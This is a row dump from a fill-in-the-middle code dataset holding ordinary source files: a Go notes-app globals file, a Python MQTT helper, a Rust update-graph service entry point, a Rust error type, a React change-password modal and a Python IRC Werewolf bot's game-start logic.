file_name (stringlengths 3–137) | prefix (stringlengths 0–918k) | suffix (stringlengths 0–962k) | middle (stringlengths 0–812k)
---|---|---|---|
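Each row below stores one source file split into prefix, suffix, and middle columns, in the style of a fill-in-the-middle (FIM) code dataset: the original file is recovered as prefix + middle + suffix. A minimal reassembly sketch in Python (the <fim_*> sentinel tokens and the helper names are illustrative assumptions, not part of this dataset):

def reassemble(row):
    # A complete source file is prefix + middle + suffix.
    return row["prefix"] + row["middle"] + row["suffix"]

def to_fim_prompt(row):
    # One common prompt layout (PSM order) for FIM training.
    return "<fim_prefix>" + row["prefix"] + "<fim_suffix>" + row["suffix"] + "<fim_middle>"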
global.go | package main
import (
"fmt"
"math/rand"
"os"
"os/exec"
"path/filepath"
"runtime"
"time"
"github.com/blevesearch/bleve"
"github.com/dustin/go-humanize"
jsoniter "github.com/json-iterator/go"
"github.com/siddontang/ledisdb/ledis"
)
type configGlobalStruct struct {
sourceFolder string
timeStart time.Time
execDir string
dataDir string
appInstalled bool
requestIndexing bool // whether a search reindex needs to be run
atStartOpenBrowser bool
atStartCheckNewNotes bool
atStartShowConsole bool
postEditor string
cmdPort string
cmdPortable bool
cmdServerMode bool
}
var configGlobal configGlobalStruct
var ConfigDB, NoteBookDB, NoteDB, TagsDB, FavoritesDB *ledis.DB //nolint:golint
type SearchService struct {
index bleve.Index
batch *bleve.Batch
}
var ss SearchService
var searchStatus struct {
Status string `json:"status"`
NotesTotal int `json:"notesTotal"`
NotesCurrent int `json:"notesCurrent"`
}
var optimizationStatus struct {
Status string `json:"status"`
NotesTotal int `json:"notesTotal"`
NotesCurrent int `json:"notesCurrent"`
}
type SearchContent struct {
UUID string `json:"uuid"`
Title string `json:"title"`
Cells []ContentCellsType `json:"cells"`
}
type SearchResult struct {
Title string `json:"title"`
UUID string `json:"uuid"`
NoteBookUUID string `json:"NoteBookUUID"`
}
var json = jsoniter.ConfigCompatibleWithStandardLibrary
type NoteBookType struct {
UUID string
Name string
Notes map[string]int64
NotesCount int
}
type NoteBookTypeAPI struct {
UUID string `json:"uuid"`
Name string `json:"name"`
NotesCount int `json:"notesCount"`
}
type NoteType struct {
CreatedAt int32 `json:"created_at"`
UpdatedAt int32 `json:"updated_at"`
Tags []string `json:"tags"`
Title string `json:"title"`
UUID string `json:"uuid"`
URL string `json:"url_src"`
NoteBookUUID string
SearchIndex bool
}
type NoteTypeWithContentAPI struct {
CreatedAt int32 `json:"created_at"`
UpdatedAt int32 `json:"updated_at"`
Tags []string `json:"tags"`
Title string `json:"title"`
UUID string `json:"uuid"`
URL string `json:"url_src"`
NoteBookUUID string
SearchIndex bool
Content string `json:"content"`
ContentType string `json:"type"`
Favorites bool `json:"favorites"`
}
type NoteTypeAPI struct {
UpdatedAt int32 `json:"updated_at"`
Title string `json:"title"`
UUID string `json:"uuid"`
NoteBookUUID string `json:"NoteBookUUID"`
}
var NoteBook = make(map[string]NoteBookType)
var TagsCloud = make(map[string][]string)
type TagsListStruct struct {
Count int `json:"count"`
Name string `json:"name"`
URL string `json:"url"`
}
type ContentCellsType struct {
Type string `json:"type"`
Data string `json:"data"`
}
type FilesForIndexType struct {
Patch string
UUID string
}
var FilesForIndex = []FilesForIndexType{}
var systrayProcess *exec.Cmd
func BytesToString(data []byte) string {
return string(data)
}
func RandStringBytes(n int) string {
const letterBytes = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
b := make([]byte, n)
for i := range b {
b[i] = letterBytes[rand.Intn(len(letterBytes))]
}
return string(b)
}
func MemStat() {
var mem runtime.MemStats
runtime.ReadMemStats(&mem)
//fmt.Printf("\nAlloc = %v\nTotalAlloc = %v\nSys = %v\nNumGC = %v\n\n", humanize.Bytes(mem.Alloc), humanize.Bytes(mem.TotalAlloc), humanize.Bytes(mem.Sys), mem.NumGC)
fmt.Printf("\nSys = %v\n\n", humanize.Bytes(mem.Sys))
}
//https://www.codesd.com/item/golang-how-to-get-the-total-size-of-the-directory.html
func DirSize2(path string) (int64, error) {
var size int64
adjSize := func(_ string, info os.FileInfo, err error) error {
if err != nil {
return err // propagate walk errors instead of dereferencing a possibly nil info
}
if !info.IsDir() {
size += info.Size()
}
return nil
}
err := filepath.Walk(path, adjSize)
return size, err
}
// https://codereview.stackexchange.com/questions/60074/in-array-in-go
func inArray(val string, array []string) bool {
for _, v := range array {
if val == v {
return true
}
}
return false
}
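For comparison, a hedged Python sketch of the DirSize2 walk above (not part of the original file); it sums regular-file sizes and skips symlinks rather than propagating stat errors the way the Go version does:

import os

def dir_size(path):
    # Total size in bytes of all regular files under path.
    total = 0
    for root, _dirs, files in os.walk(path):
        for name in files:
            fp = os.path.join(root, name)
            if not os.path.islink(fp):
                total += os.path.getsize(fp)
    return total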
utils.py | from threading import Event
class Message:
    """Blocking future for an MQTT request/response exchange."""
    def __init__(self, timeout=10):
        self._ready = Event()
        self._timeout = timeout
        self._response = None

    @property
    def result(self):
        # Block until the response arrives (or the timeout expires).
        received = self._ready.wait(timeout=self._timeout)
        if not received:
            raise MqttError("CONNECTION", "No Response Received")
        if not self._response['ok']:
            raise MqttError(self._response['errorCode'], self._response['error'])
        return self._response['data']

    @result.setter
    def result(self, dato):
        self._response = dato
        self._ready.set()

    def __len__(self):
        return len(self.result)

    def __getitem__(self, key):
        return self.result[key]

    def __iter__(self):
        return self.result.__iter__()

    def __contains__(self, key):
        return key in self.result

class MqttError(Exception):
    def __init__(self, error_code, description):
        self.error_code = error_code
        self.description = description
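A hedged usage sketch for the Message class above: the caller blocks on .result while another thread (for example an MQTT on_message callback) delivers a response dict of the shape Message.result expects; the timer-based delivery below is illustrative only.

import threading

pending = Message(timeout=5)

def on_response(payload):
    pending.result = payload  # the setter stores the dict and sets the internal Event

threading.Timer(0.1, on_response, args=({"ok": True, "data": [1, 2, 3]},)).start()
print(len(pending), list(pending))  # blocks until delivery, then prints: 3 [1, 2, 3]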
main.rs | // Copyright 2018 Alex Crawford
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
extern crate actix;
extern crate actix_web;
extern crate failure;
extern crate graph_builder;
#[macro_use]
extern crate log;
extern crate structopt;
extern crate tempfile;
use crate::failure::ResultExt;
use actix_web::{App, HttpServer};
use cincinnati::plugins::prelude::*;
use commons::metrics::{self, HasRegistry};
use failure::Error;
use graph_builder::{config, graph, graph::RwLock, status};
use std::sync::Arc;
use std::thread;
/// Common prefix for graph-builder metrics.
pub static METRICS_PREFIX: &str = "cincinnati_gb";
fn main() -> Result<(), Error> {
let sys = actix::System::new("graph-builder");
let settings = config::AppSettings::assemble().context("could not assemble AppSettings")?;
env_logger::Builder::from_default_env()
.filter(Some(module_path!()), settings.verbosity)
.init();
debug!("application settings:\n{:#?}", settings);
let plugins: Vec<BoxedPlugin> = if settings.disable_quay_api_metadata {
Default::default()
} else {
// TODO(lucab): drop this when plugins are configurable.
use cincinnati::plugins::internal::edge_add_remove::{
EdgeAddRemovePlugin, DEFAULT_REMOVE_ALL_EDGES_VALUE,
};
use cincinnati::plugins::internal::metadata_fetch_quay::{
QuayMetadataFetchPlugin, DEFAULT_QUAY_LABEL_FILTER, DEFAULT_QUAY_MANIFESTREF_KEY,
};
use cincinnati::plugins::internal::node_remove::NodeRemovePlugin;
use quay::v1::DEFAULT_API_BASE;
// TODO(steveeJ): actually make this vec configurable
new_plugins!(
InternalPluginWrapper(
// TODO(lucab): source options from plugins config.
QuayMetadataFetchPlugin::try_new(
settings.repository.clone(),
DEFAULT_QUAY_LABEL_FILTER.to_string(),
DEFAULT_QUAY_MANIFESTREF_KEY.to_string(),
None,
DEFAULT_API_BASE.to_string(),
)
.context("could not initialize the QuayMetadataPlugin")?,
),
InternalPluginWrapper(NodeRemovePlugin {
key_prefix: DEFAULT_QUAY_LABEL_FILTER.to_string(),
}),
InternalPluginWrapper(EdgeAddRemovePlugin {
key_prefix: DEFAULT_QUAY_LABEL_FILTER.to_string(),
remove_all_edges_value: DEFAULT_REMOVE_ALL_EDGES_VALUE.to_string(),
})
)
};
let registry: prometheus::Registry = metrics::new_registry(Some(METRICS_PREFIX.to_string()))?;
let service_addr = (settings.address, settings.port);
let status_addr = (settings.status_address, settings.status_port);
let app_prefix = settings.path_prefix.clone();
// Shared state.
let state = {
let json_graph = Arc::new(RwLock::new(String::new()));
let live = Arc::new(RwLock::new(false));
let ready = Arc::new(RwLock::new(false));
graph::State::new(
json_graph.clone(),
settings.mandatory_client_parameters.clone(),
live.clone(),
ready.clone(),
Box::leak(Box::new(plugins)),
Box::leak(Box::new(registry)),
)
};
// Graph scraper
let graph_state = state.clone();
thread::spawn(move || graph::run(&settings, &graph_state));
// Status service.
graph::register_metrics(state.registry())?;
let status_state = state.clone();
HttpServer::new(move || {
App::new()
.register_data(actix_web::web::Data::new(status_state.clone()))
.service(
actix_web::web::resource("/liveness")
.route(actix_web::web::get().to(status::serve_liveness)),
)
.service(
actix_web::web::resource("/metrics")
.route(actix_web::web::get().to(metrics::serve::<graph::State>)),
)
.service(
actix_web::web::resource("/readiness")
.route(actix_web::web::get().to(status::serve_readiness)),
)
})
.bind(status_addr)?
.start();
// Main service.
let main_state = state.clone();
HttpServer::new(move || {
App::new()
.register_data(actix_web::web::Data::new(main_state.clone()))
.service(
actix_web::web::resource(&format!("{}/v1/graph", app_prefix.clone()))
.route(actix_web::web::get().to(graph::index)),
)
})
.bind(service_addr)?
.start();
let _ = sys.run();
Ok(())
}
#[cfg(test)]
mod tests {
use super::*;
use crate::graph::State;
use actix_web::test::TestRequest;
use commons::metrics::HasRegistry;
use commons::testing;
use failure::{bail, Fallible};
use parking_lot::RwLock;
use prometheus::Registry;
use std::collections::HashSet;
use std::sync::Arc;
fn mock_state() -> State {
let json_graph = Arc::new(RwLock::new(String::new()));
let live = Arc::new(RwLock::new(false));
let ready = Arc::new(RwLock::new(false));
let plugins = Box::leak(Box::new([]));
let registry: &'static Registry = Box::leak(Box::new(
metrics::new_registry(Some(METRICS_PREFIX.to_string())).unwrap(),
));
State::new(
json_graph.clone(),
HashSet::new(),
live.clone(),
ready.clone(),
plugins,
registry,
)
}
#[test]
fn serve_metrics_basic() -> Fallible<()> {
let mut rt = testing::init_runtime()?;
let state = mock_state();
let registry = <dyn HasRegistry>::registry(&state);
graph::register_metrics(registry)?;
testing::dummy_gauge(registry, 42.0)?;
let http_req = TestRequest::default().data(state).to_http_request();
let metrics_call = metrics::serve::<graph::State>(http_req);
let resp = rt.block_on(metrics_call)?;
assert_eq!(resp.status(), 200);
if let actix_web::body::ResponseBody::Body(body) = resp.body() {
if let actix_web::body::Body::Bytes(bytes) = body {
assert!(!bytes.is_empty());
println!("{:?}", std::str::from_utf8(bytes.as_ref()));
assert!(
twoway::find_bytes(bytes.as_ref(), b"cincinnati_gb_dummy_gauge 42\n").is_some()
);
} else {
bail!("expected Body")
}
} else {
bail!("expected bytes in body")
};
Ok(())
}
}
error.rs | use std::{error::Error, fmt, net::SocketAddr};
/// An Error type specifically related to the Naia Server Socket
/// This is under construction and needs to be cleaned up
#[derive(Debug)]
pub enum NaiaServerSocketError {
/// A wrapped error from another library/codebase
Wrapped(Box<dyn Error>),
/// An error indicating an inability to send to the given address
SendError(SocketAddr),
}
impl fmt::Display for NaiaServerSocketError {
fn fmt(&self, f: &mut fmt::Formatter) -> Result<(), fmt::Error> {
match self {
NaiaServerSocketError::Wrapped(boxed_err) => fmt::Display::fmt(boxed_err.as_ref(), f),
NaiaServerSocketError::SendError(addr) => fmt::Display::fmt(&addr, f),
}
}
}
impl Error for NaiaServerSocketError {}
change-password.js | import React, { Component } from "react";
import PropTypes from "prop-types";
import { connect } from "react-redux";
import { analytics, validators } from "additional";
import { appOperations } from "modules/app";
import ErrorFieldTooltip from "components/ui/error_field_tooltip";
import { info } from "modules/notifications";
import { ProfileFullPath } from "routes";
import Modal from "components/modal";
class ChangePassword extends Component {
constructor(props) {
super(props);
this.closeModal = this.closeModal.bind(this);
this.changePassword = this.changePassword.bind(this);
this.state = {
confPasswordError: null,
newPasswordError: null,
oldPasswordError: null,
};
analytics.pageview(`${ProfileFullPath}/change-password`, "Change Password");
}
closeModal() {
const { dispatch } = this.props;
analytics.event({ action: "Change Password Modal", category: "Profile", label: "Back" });
dispatch(appOperations.closeModal());
}
async changePassword(event) {
event.preventDefault();
const { dispatch } = this.props;
analytics.event({ action: "Change Password Modal", category: "Profile", label: "Change" });
const oldPassword = this.old_password.value.trim();
const newPassword = this.new_password.value.trim();
const confPassword = this.conf_new_password.value.trim();
const oldPasswordError = validators.validatePass(oldPassword);
const newPasswordError =
validators.validatePass(newPassword) ||
validators.validatePassDiff(oldPassword, newPassword);
const confPasswordError =
validators.validatePass(confPassword) || validators.validatePassMismatch(newPassword, confPassword);
if (oldPasswordError || newPasswordError || confPasswordError) {
this.setState({
confPasswordError,
newPasswordError,
oldPasswordError,
});
return;
}
this.setState({
confPasswordError,
newPasswordError,
oldPasswordError,
});
dispatch(info({ message: "Password updated" }));
this.closeModal();
}
render() {
return (
<Modal title="Change password" onClose={this.closeModal}>
<form onSubmit={this.changePassword}>
<div className="modal-body">
<div className="row form-row">
<div className="col-xs-12">
<div className="form-label">
<label htmlFor="old_password">
Old password
</label>
</div>
</div>
<div className="col-xs-12">
<input
id="old_password"
className={`form-text ${this.state.oldPasswordError ? "form-text__error" : ""}`}
name="old_password"
placeholder="●●●●●●"
ref={(input) => {
this.old_password = input;
}}
onChange={() => this.setState({ oldPasswordError: null })}
type="password"
/>
<ErrorFieldTooltip text={this.state.oldPasswordError} />
</div>
</div>
<div className="row form-row">
<div className="col-xs-12">
<div className="form-label">
<label htmlFor="new_password">
New password
</label>
</div>
</div>
<div className="col-xs-12">
<input
id="new_password"
className={`form-text ${this.state.newPasswordError ? "form-text__error" : ""}`}
name="new_password"
placeholder="●●●●●●"
ref={(input) => {
this.new_password = input;
}}
onChange={() => this.setState({ newPasswordError: null })}
type="password"
/>
<ErrorFieldTooltip text={this.state.newPasswordError} />
</div>
</div>
<div className="row form-row">
<div className="col-xs-12">
<div className="form-label">
<label htmlFor="conf_new_password">
Confirm password
</label>
</div>
</div>
<div className="col-xs-12">
<input
id="conf_new_password"
className={`form-text ${this.state.confPasswordError ? "form-text__error" : ""}`}
name="conf_new_password"
placeholder="●●●●●●"
ref={(input) => {
this.conf_new_password = input;
}}
onChange={() => this.setState({ confPasswordError: null })}
type="password"
/>
<ErrorFieldTooltip text={this.state.confPasswordError} />
</div>
</div>
</div>
<div className="modal-footer">
<div className="row">
<div className="col-xs-12 text-right">
<button
className="button button__link text-uppercase"
type="button"
onClick={this.closeModal}
>
Back
</button>
<button
className="button button__orange button__create"
type="submit"
>
CHANGE
</button>
</div>
</div>
</div>
</form>
</Modal>
);
}
}
ChangePassword.propTypes = {
dispatch: PropTypes.func.isRequired,
};
export default connect()(ChangePassword);
pregame.py | from collections import defaultdict, Counter
from datetime import datetime, timedelta
import threading
import itertools
import random
import time
import math
import re
from src.containers import UserDict, UserSet
from src.decorators import COMMANDS, command, event_listener, handle_error
from src.functions import get_players
from src.warnings import decrement_stasis
from src.messages import messages
from src.events import Event
from src.cats import Wolfchat, All
from src import channels
import botconfig
WAIT_LOCK = threading.RLock()
WAIT_TOKENS = 0
WAIT_LAST = 0
LAST_START = UserDict() # type: UserDict[users.User, List[datetime, int]]
LAST_WAIT = UserDict() # type: UserDict[users.User, datetime]
START_VOTES = UserSet() # type: UserSet[users.User]
RESTART_TRIES = 0 # type: int
MAX_RETRIES = 3 # constant: not a setting
@command("wait", playing=True, phases=("join",))
def wait(var, wrapper, message):
"""Increase the wait time until !start can be used."""
if wrapper.target is not channels.Main:
return
pl = get_players()
with WAIT_LOCK:
global WAIT_TOKENS, WAIT_LAST
wait_check_time = time.time()
WAIT_TOKENS += (wait_check_time - WAIT_LAST) / var.WAIT_TB_DELAY
WAIT_LAST = wait_check_time
WAIT_TOKENS = min(WAIT_TOKENS, var.WAIT_TB_BURST)
now = datetime.now()
if ((LAST_WAIT and wrapper.source in LAST_WAIT and LAST_WAIT[wrapper.source] +
timedelta(seconds=var.WAIT_RATE_LIMIT) > now) or WAIT_TOKENS < 1):
wrapper.pm(messages["command_ratelimited"])
return
LAST_WAIT[wrapper.source] = now
WAIT_TOKENS -= 1
if now > var.CAN_START_TIME:
var.CAN_START_TIME = now + timedelta(seconds=var.EXTRA_WAIT)
else:
var.CAN_START_TIME += timedelta(seconds=var.EXTRA_WAIT)
wrapper.send(messages["wait_time_increase"].format(wrapper.source, var.EXTRA_WAIT))
@command("fwait", flag="w", phases=("join",))
def fwait(var, wrapper, message):
"""Force an increase (or decrease) in wait time. Can be used with a number of seconds to wait."""
pl = get_players()
msg = re.split(" +", message.strip(), 1)[0]
if msg and (msg.isdigit() or (msg[0] == "-" and msg[1:].isdigit())):
extra = int(msg)
else:
extra = var.EXTRA_WAIT
now = datetime.now()
extra = max(-900, min(900, extra))
if now > var.CAN_START_TIME:
var.CAN_START_TIME = now + timedelta(seconds=extra)
else:
var.CAN_START_TIME += timedelta(seconds=extra)
if extra >= 0:
wrapper.send(messages["forced_wait_time_increase"].format(wrapper.source, abs(extra)))
else:
wrapper.send(messages["forced_wait_time_decrease"].format(wrapper.source, abs(extra)))
@command("start", phases=("none", "join"))
def start_cmd(var, wrapper, message):
"""Start a game of Werewolf."""
if wrapper.target is channels.Main:
start(var, wrapper)
@command("fstart", flag="S", phases=("join",))
def fstart(var, wrapper, message):
"""Force the game to start immediately."""
channels.Main.send(messages["fstart_success"].format(wrapper.source))
wrapper.target = channels.Main
start(var, wrapper, forced=True)
@command("retract", phases=("day", "join"))
def retract(var, wrapper, message):
"""Take back your vote during the day (for whom to lynch)."""
if wrapper.source not in get_players() or wrapper.source in var.DISCONNECTED:
return
with var.GRAVEYARD_LOCK, var.WARNING_LOCK:
if var.PHASE == "join":
if wrapper.source not in START_VOTES:
wrapper.pm(messages["start_novote"])
else:
START_VOTES.discard(wrapper.source)
wrapper.send(messages["start_retract"].format(wrapper.source))
if not START_VOTES:
var.TIMERS["start_votes"][0].cancel()
del var.TIMERS["start_votes"]
@event_listener("del_player")
def on_del_player(evt, var, player, all_roles, death_triggers):
if var.PHASE == "join":
with var.WARNING_LOCK:
START_VOTES.discard(player)
# Cancel the start vote timer if there are no votes left
if not START_VOTES and "start_votes" in var.TIMERS:
var.TIMERS["start_votes"][0].cancel()
del var.TIMERS["start_votes"]
def start(var, wrapper, *, forced=False, restart=""):
if (not forced and LAST_START and wrapper.source in LAST_START and
LAST_START[wrapper.source][0] + timedelta(seconds=var.START_RATE_LIMIT) >
datetime.now() and not restart):
LAST_START[wrapper.source][1] += 1
wrapper.source.send(messages["command_ratelimited"])
return
if restart:
global RESTART_TRIES
RESTART_TRIES += 1
if RESTART_TRIES > MAX_RETRIES:
from src.wolfgame import stop_game
stop_game(var, abort=True)
return
if not restart:
LAST_START[wrapper.source] = [datetime.now(), 1]
villagers = get_players()
vils = set(get_players())
if not restart:
if var.PHASE == "none":
wrapper.source.send(messages["no_game_running"])
return
if var.PHASE != "join":
wrapper.source.send(messages["werewolf_already_running"])
return
if wrapper.source not in villagers and not forced:
return
now = datetime.now()
var.GAME_START_TIME = now # Only used for the idler checker
dur = int((var.CAN_START_TIME - now).total_seconds())
if dur > 0 and not forced:
wrapper.send(messages["please_wait"].format(dur))
return
if len(villagers) < var.MIN_PLAYERS:
wrapper.send(messages["not_enough_players"].format(wrapper.source, var.MIN_PLAYERS))
return
if len(villagers) > var.MAX_PLAYERS:
wrapper.send(messages["max_players"].format(wrapper.source, var.MAX_PLAYERS))
return
with var.WARNING_LOCK:
if not forced and wrapper.source in START_VOTES:
wrapper.pm(messages["start_already_voted"])
return
start_votes_required = min(math.ceil(len(villagers) * var.START_VOTES_SCALE), var.START_VOTES_MAX)
if not forced and len(START_VOTES) < start_votes_required:
# If there's only one more vote required, start the game immediately.
# Checked here to make sure that a player that has already voted can't
# vote again for the final start.
if len(START_VOTES) < start_votes_required - 1:
START_VOTES.add(wrapper.source)
remaining_votes = start_votes_required - len(START_VOTES)
wrapper.send(messages["start_voted"].format(wrapper.source, remaining_votes))
# If this was the first vote
if len(START_VOTES) == 1:
t = threading.Timer(60, expire_start_votes, (var, wrapper.target))
var.TIMERS["start_votes"] = (t, time.time(), 60)
t.daemon = True
t.start()
return
if not var.FGAMED:
votes = {} #key = gamemode, not hostmask
for gamemode in var.GAMEMODE_VOTES.values():
if len(villagers) >= var.GAME_MODES[gamemode][1] and len(villagers) <= var.GAME_MODES[gamemode][2]:
votes[gamemode] = votes.get(gamemode, 0) + 1
voted = [gamemode for gamemode in votes if votes[gamemode] == max(votes.values()) and votes[gamemode] >= len(villagers)/2]
if voted:
from src.wolfgame import cgamemode
cgamemode(random.choice(voted))
else:
possiblegamemodes = []
numvotes = 0
for gamemode, num in votes.items():
if len(villagers) < var.GAME_MODES[gamemode][1] or len(villagers) > var.GAME_MODES[gamemode][2] or var.GAME_MODES[gamemode][3] == 0:
continue
possiblegamemodes += [gamemode] * num
numvotes += num
if len(villagers) - numvotes > 0:
possiblegamemodes += [None] * ((len(villagers) - numvotes) // 2)
# check if we go with a voted mode or a random mode
gamemode = random.choice(possiblegamemodes)
if gamemode is None:
possiblegamemodes = []
for gamemode in var.GAME_MODES.keys() - var.DISABLED_GAMEMODES:
if len(villagers) >= var.GAME_MODES[gamemode][1] and len(villagers) <= var.GAME_MODES[gamemode][2] and var.GAME_MODES[gamemode][3] > 0:
possiblegamemodes += [gamemode] * var.GAME_MODES[gamemode][3]
gamemode = random.choice(possiblegamemodes)
from src.wolfgame import cgamemode
cgamemode(gamemode)
else:
from src.wolfgame import cgamemode
cgamemode(restart)
var.GAME_ID = time.time() # restart reaper timer
from src.wolfgame import chk_win_conditions # TODO: Move that into its own postgame module
event = Event("role_attribution", {"addroles": Counter()})
if event.dispatch(var, chk_win_conditions, villagers):
addroles = event.data["addroles"]
strip = lambda x: re.sub(r"\(.*\)", "", x)
lv = len(villagers)
roles = []
for num, rolelist in var.CURRENT_GAMEMODE.ROLE_GUIDE.items():
if num <= lv:
roles.extend(rolelist)
defroles = Counter(strip(x) for x in roles)
for role, count in list(defroles.items()):
if role[0] == "-":
srole = role[1:]
defroles[srole] -= count
del defroles[role]
if defroles[srole] == 0:
del defroles[srole]
if not defroles:
wrapper.send(messages["no_settings_defined"].format(wrapper.source, lv))
return
for role, num in defroles.items():
addroles[role] = max(addroles.get(role, num), len(var.FORCE_ROLES.get(role, ())))
if sum([addroles[r] for r in addroles if r not in var.CURRENT_GAMEMODE.SECONDARY_ROLES]) > lv:
wrapper.send(messages["too_many_roles"])
return
for role in All:
addroles.setdefault(role, 0)
else:
addroles = event.data["addroles"]
# convert roleset aliases into the appropriate roles
possible_rolesets = [Counter()]
roleset_roles = defaultdict(int)
var.CURRENT_GAMEMODE.ACTIVE_ROLE_SETS = {}
for role, amt in list(addroles.items()):
# not a roleset? add a fixed amount of them
if role not in var.CURRENT_GAMEMODE.ROLE_SETS:
for pr in possible_rolesets:
pr[role] += amt
continue
# if a roleset, ensure we don't try to expose the roleset name in !stats or future attribution
# but do keep track of the sets in use so we can have !stats reflect proper information
var.CURRENT_GAMEMODE.ACTIVE_ROLE_SETS[role] = amt
del addroles[role]
# init !stats with all 0s so that it can number things properly; the keys need to exist in the Counter
# across every possible roleset so that !stats works right
rs = Counter(var.CURRENT_GAMEMODE.ROLE_SETS[role])
for r in rs:
for pr in possible_rolesets:
pr[r] += 0
toadd = random.sample(list(rs.elements()), amt)
for r in toadd:
addroles[r] += 1
roleset_roles[r] += 1
add_rolesets = []
temp_rolesets = []
for c in itertools.combinations(rs.elements(), amt):
add_rolesets.append(Counter(c))
for pr in possible_rolesets:
for ar in add_rolesets:
temp = Counter(pr)
temp.update(ar)
temp_rolesets.append(temp)
possible_rolesets = temp_rolesets
if var.ORIGINAL_SETTINGS and not restart: # Custom settings
need_reset = True
wvs = sum(addroles[r] for r in Wolfchat)
if len(villagers) < (sum(addroles.values()) - sum(addroles[r] for r in var.CURRENT_GAMEMODE.SECONDARY_ROLES)):
wrapper.send(messages["too_few_players_custom"])
elif not wvs and var.CURRENT_GAMEMODE.name != "villagergame":
wrapper.send(messages["need_one_wolf"])
elif wvs > (len(villagers) / 2):
wrapper.send(messages["too_many_wolves"])
else:
need_reset = False
if need_reset:
from src.wolfgame import reset_settings
reset_settings()
wrapper.send(messages["default_reset"])
var.PHASE = "join"
return
if var.ADMIN_TO_PING is not None and not restart:
for decor in (COMMANDS["join"] + COMMANDS["start"]):
decor(_command_disabled)
var.ROLES.clear()
var.MAIN_ROLES.clear()
var.NIGHT_COUNT = 0
var.DAY_COUNT = 0
var.FINAL_ROLES.clear()
var.EXTRA_WOLVES = 0
var.DEADCHAT_PLAYERS.clear()
var.SPECTATING_WOLFCHAT.clear()
var.SPECTATING_DEADCHAT.clear()
for role in All:
var.ROLES[role] = UserSet()
var.ROLES[var.DEFAULT_ROLE] = UserSet()
for role, ps in var.FORCE_ROLES.items():
if role not in var.CURRENT_GAMEMODE.SECONDARY_ROLES.keys():
vils.difference_update(ps)
for role, count in addroles.items():
if role in var.CURRENT_GAMEMODE.SECONDARY_ROLES:
var.ROLES[role] = (None,) * count
continue # We deal with those later, see below
to_add = set()
if role in var.FORCE_ROLES:
if len(var.FORCE_ROLES[role]) > count:
channels.Main.send(messages["error_frole_too_many"].format(role))
return
for user in var.FORCE_ROLES[role]:
# If multiple main roles were forced, only first one is put in MAIN_ROLES
if user not in var.MAIN_ROLES:
var.MAIN_ROLES[user] = role
var.ORIGINAL_MAIN_ROLES[user] = role
to_add.add(user)
count -= 1
selected = random.sample(vils, count)
for x in selected:
var.MAIN_ROLES[x] = role
var.ORIGINAL_MAIN_ROLES[x] = role
vils.remove(x)
var.ROLES[role].update(selected)
var.ROLES[role].update(to_add)
var.ROLES[var.DEFAULT_ROLE].update(vils)
for x in vils:
var.MAIN_ROLES[x] = var.DEFAULT_ROLE
var.ORIGINAL_MAIN_ROLES[x] = var.DEFAULT_ROLE
if vils:
for pr in possible_rolesets:
pr[var.DEFAULT_ROLE] += len(vils)
# Collapse possible_rolesets into var.ROLE_STATS
# which is a FrozenSet[FrozenSet[Tuple[str, int]]]
possible_rolesets_set = set()
event = Event("reconfigure_stats", {"new": []})
for pr in possible_rolesets:
event.data["new"] = [pr]
event.dispatch(var, pr, "start")
for v in event.data["new"]:
if min(v.values()) >= 0:
possible_rolesets_set.add(frozenset(v.items()))
var.ROLE_STATS = frozenset(possible_rolesets_set)
# Now for the secondary roles
for role, dfn in var.CURRENT_GAMEMODE.SECONDARY_ROLES.items():
count = len(var.ROLES[role])
var.ROLES[role] = UserSet()
if role in var.FORCE_ROLES:
ps = var.FORCE_ROLES[role]
var.ROLES[role].update(ps)
count -= len(ps)
# Don't do anything further if this secondary role was forced on enough players already
if count <= 0:
continue
possible = get_players(dfn)
if len(possible) < count:
wrapper.send(messages["not_enough_targets"].format(role))
if var.ORIGINAL_SETTINGS:
from src.wolfgame import reset_settings
var.ROLES.clear()
var.ROLES["person"] = UserSet(var.ALL_PLAYERS)
reset_settings()
wrapper.send(messages["default_reset"])
var.PHASE = "join"
return
else:
wrapper.send(messages["role_skipped"])
continue
var.ROLES[role].update(x for x in random.sample(possible, count))
with var.WARNING_LOCK: # cancel timers
for name in ("join", "join_pinger", "start_votes"):
if name in var.TIMERS:
var.TIMERS[name][0].cancel()
del var.TIMERS[name]
var.LAST_STATS = None
var.LAST_TIME = None
for role, players in var.ROLES.items():
for player in players:
evt = Event("new_role", {"messages": [], "role": role, "in_wolfchat": False}, inherit_from=None)
evt.dispatch(var, player, None)
if not restart:
gamemode = var.CURRENT_GAMEMODE.name
if gamemode == "villagergame":
gamemode = "default"
# Alert the players to option changes they may not be aware of
# All keys begin with gso_* (game start options)
options = []
if var.ORIGINAL_SETTINGS.get("ROLE_REVEAL") is not None:
# Keys used here: gso_rr_on, gso_rr_team, gso_rr_off
options.append(messages["gso_rr_{0}".format(var.ROLE_REVEAL)])
if var.ORIGINAL_SETTINGS.get("STATS_TYPE") is not None:
# Keys used here: gso_st_default, gso_st_accurate, gso_st_team, gso_st_disabled
options.append(messages["gso_st_{0}".format(var.STATS_TYPE)])
if var.ORIGINAL_SETTINGS.get("ABSTAIN_ENABLED") is not None or var.ORIGINAL_SETTINGS.get("LIMIT_ABSTAIN") is not None:
if var.ABSTAIN_ENABLED and var.LIMIT_ABSTAIN:
options.append(messages["gso_abs_rest"])
elif var.ABSTAIN_ENABLED:
options.append(messages["gso_abs_unrest"])
else:
options.append(messages["gso_abs_none"])
key = "welcome_simple"
if options:
key = "welcome_options"
wrapper.send(messages[key].format(villagers, gamemode, options))
wrapper.target.mode("+m")
var.ORIGINAL_ROLES.clear()
for role, players in var.ROLES.items():
var.ORIGINAL_ROLES[role] = players.copy()
var.DAY_TIMEDELTA = timedelta(0)
var.NIGHT_TIMEDELTA = timedelta(0)
var.DAY_START_TIME = datetime.now()
var.NIGHT_START_TIME = datetime.now()
var.LAST_PING = None
if restart:
var.PHASE = "join" # allow transition_* to run properly if game was restarted on first night
if not var.START_WITH_DAY:
from src.wolfgame import transition_night
var.GAMEPHASE = "day" # gamephase needs to be the thing we're transitioning from
transition_night()
else:
from src.wolfgame import transition_day
var.FIRST_DAY = True
var.GAMEPHASE = "night"
transition_day()
decrement_stasis()
